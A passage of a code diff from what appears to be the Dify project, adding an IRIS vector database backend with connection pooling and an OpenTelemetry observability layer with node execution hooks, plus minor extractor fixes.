IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def __init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. 
+ + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema; close it afterwards if it + # was created outside the pool + conn = self._pool[0] if self._pool else None + borrowed = conn is not None + if conn is None: + conn = self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + if not borrowed: + conn.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + """Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" 
+ cursor.execute(sql, (id,)) + return cursor.fetchone() is not None + except (OSError, RuntimeError, ValueError): + return False + + def delete_by_ids(self, ids: list[str]) -> None: + if not ids: + return + + with self._get_cursor() as cursor: + placeholders = ",".join(["?" for _ in ids]) + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})" + cursor.execute(sql, ids) + + def delete_by_metadata_field(self, key: str, value: str) -> None: + """Delete documents by metadata field (JSON LIKE pattern matching).""" + with self._get_cursor() as cursor: + pattern = f'%"{key}": "{value}"%' + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?" + cursor.execute(sql, (pattern,)) + + def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]: + """Search similar documents using VECTOR_COSINE with HNSW index.""" + top_k = kwargs.get("top_k", 4) + score_threshold = float(kwargs.get("score_threshold") or 0.0) + embedding_str = json.dumps(query_vector) + + with self._get_cursor() as cursor: + sql = f""" + SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score + FROM {self.schema}.{self.table_name} + ORDER BY score DESC + """ + cursor.execute(sql, (embedding_str,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 4: + text, meta_str, score = row[1], row[2], float(row[3]) + if score >= score_threshold: + metadata = json.loads(meta_str) if meta_str else {} + metadata["score"] = score + docs.append(Document(page_content=text, metadata=metadata)) + return docs + + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: + """Search documents by full-text using iFind index or fallback to LIKE search.""" + top_k = kwargs.get("top_k", 5) + + with self._get_cursor() as cursor: + if self.config.IRIS_TEXT_INDEX: + # Use iFind full-text search with index + text_index_name = f"idx_{self.table_name}_text" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE %ID %FIND search_index({text_index_name}, ?) + """ + cursor.execute(sql, (query,)) + else: + # Fallback to LIKE search (inefficient for large datasets) + query_pattern = f"%{query}%" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE text LIKE ? + """ + cursor.execute(sql, (query_pattern,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 3: + metadata = json.loads(row[2]) if row[2] else {} + docs.append(Document(page_content=row[1], metadata=metadata)) + + if not docs: + logger.info("Full-text search for '%s' returned no results", query) + + return docs + + def delete(self) -> None: + """Delete the entire collection (drop table - permanent).""" + with self._get_cursor() as cursor: + sql = f"DROP TABLE {self.schema}.{self.table_name}" + cursor.execute(sql) + + def _create_collection(self, dimension: int) -> None: + """Create table with VECTOR column and HNSW index. + + Uses Redis lock to prevent concurrent creation attempts across multiple + API server instances (api, worker, worker_beat). 
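One design note on the SQL built throughout this class: DB-API bind parameters (`?`) substitute values only, never identifiers, so schema and table names are interpolated with f-strings (they come from internal configuration, not user input) while row data is always bound. A generic sketch, assuming any DB-API-style cursor:

```python
def fetch_doc(cursor, schema: str, table: str, doc_id: str):
    # Identifiers cannot be bound parameters, so they are formatted in; they
    # must originate from trusted configuration, never from user input.
    sql = f"SELECT text, meta FROM {schema}.{table} WHERE id = ?"
    cursor.execute(sql, (doc_id,))  # the value still goes through a bind parameter
    return cursor.fetchone()
```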
+ """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 3a47241293..b9772b3c08 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -163,7 +163,7 @@ class Vector: from core.rag.datasource.vdb.lindorm.lindorm_vector import 
LindormVectorStoreFactory return LindormVectorStoreFactory - case VectorType.OCEANBASE: + case VectorType.OCEANBASE | VectorType.SEEKDB: from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory return OceanBaseVectorFactory @@ -187,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..bd99a31446 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -27,8 +27,10 @@ class VectorType(StrEnum): UPSTASH = "upstash" TIDB_ON_QDRANT = "tidb_on_qdrant" OCEANBASE = "oceanbase" + SEEKDB = "seekdb" OPENGAUSS = "opengauss" TABLESTORE = "tablestore" HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py index c3bfbce98f..0c42034073 100644 --- a/api/core/rag/extractor/entity/extract_setting.py +++ b/api/core/rag/extractor/entity/extract_setting.py @@ -10,7 +10,7 @@ class NotionInfo(BaseModel): """ credential_id: str | None = None - notion_workspace_id: str + notion_workspace_id: str | None = "" notion_obj_id: str notion_page_type: str document: Document | None = None diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/api/core/rag/extractor/word_extractor.py b/api/core/rag/extractor/word_extractor.py index 438932cfd6..044b118635 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -84,7 +84,7 @@ class WordExtractor(BaseExtractor): image_count = 0 image_map = {} - for rId, rel in doc.part.rels.items(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: @@ -121,9 +121,8 @@ class WordExtractor(BaseExtractor): used_at=naive_utc_now(), ) db.session.add(upload_file) - db.session.commit() - # Use rId as key for external images since target_part is undefined - image_map[rId] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" + # Use r_id as key for external images since target_part is undefined + image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -151,12 +150,11 @@ class WordExtractor(BaseExtractor): used_at=naive_utc_now(), ) db.session.add(upload_file) - db.session.commit() # Use target_part as key for internal 
images image_map[rel.target_part] = ( f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" ) - + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py 
b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node.execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node.execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... 
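The `on_node_run_start`/`on_node_run_end` hooks added to `GraphEngineLayer` above make per-node behavior pluggable beyond tracing. A hypothetical sketch of another consumer, a timing layer (the class name and log format are illustrative, not part of the patch; all base callbacks are implemented in case some are abstract):

```python
import logging
import time

from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.nodes.base.node import Node

logger = logging.getLogger(__name__)


class NodeTimingLayer(GraphEngineLayer):
    """Logs wall-clock duration for every node execution via the new hooks."""

    def __init__(self) -> None:
        super().__init__()
        self._started: dict[str, float] = {}

    def on_graph_start(self) -> None:
        self._started.clear()

    def on_event(self, event) -> None:
        pass  # this layer only cares about the node-level hooks

    def on_graph_end(self, error: Exception | None) -> None:
        self._started.clear()

    def on_node_run_start(self, node: Node) -> None:
        # execution_id is ensured by the worker before hooks fire
        self._started[node.execution_id] = time.perf_counter()

    def on_node_run_end(self, node: Node, error: Exception | None) -> None:
        started = self._started.pop(node.execution_id, None)
        if started is not None:
            status = "failed" if error else "ok"
            logger.info("node %s %s in %.3fs", node.id, status, time.perf_counter() - started)
```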
+ + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. 
+ + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. 
+ """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in 
node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ 